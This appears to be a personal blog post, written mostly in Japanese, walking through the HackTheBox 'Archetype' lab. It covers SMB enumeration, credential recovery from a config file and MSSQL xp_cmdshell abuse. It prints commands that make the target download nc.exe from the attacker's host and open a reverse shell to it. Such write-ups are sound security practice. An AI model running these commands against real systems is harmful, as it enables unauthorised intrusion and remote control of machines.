banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github

[模擬渗透記録]-HackTheBox-Tier2 _ Archetype - 1

image.png
スキャン IP、139 および 445 ポートを見つけ、SMB であることを知る
db_nmap -sV 10.129.243.80
image.png
smbclient -L IP
接続を試み、パスワードが空であることを確認し、共有フォルダに入り、ファイルを見つける
image.png
get prod.dtsConfig
ローカルにダウンロードする
cat prod.dtsConfig
ID と passwd が含まれていることがわかる

image.png
impacket-mssqlclient sql_svc@ip -windows-auth
Kali に搭載されている msql クライアントで IP に接続し、パスワードが空であることを確認する

image.png
xp_cmdshell "whoami"
cmd コマンドを出力できるかどうかを試す

image.png
xp_cmdshell "nc"
nc を使用できるかどうかをテストし、nc コマンドがあれば逆シェルを使用して持続的なシェルを確立できる。
結果はありません

ローカルに nc.exe をダウンロードして準備します。

SQL > に入力:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.30/nc.exe -outfile nc.exe"

image.png

ダウンロード完了後、nc lvnp 4443 で 4443 ポートをリッスン
image.png
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.16.30 4443"
このパスで nc.exe を実行し、この IP のこのポートにリクエストし、シェルを取得する
ターゲットシステム:Windows

image.png
dir: 現在のディレクトリのすべてのファイルをリストアップ
cd .. 上のディレクトリに移動
type: user.txt ファイルの内容を表示
最後に Desktop で user.txt を見つけ、開いてフラグを取得

=================================================================
C:\Users\sql_svc\Desktop>type user.txt
type user.txt

image.png

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。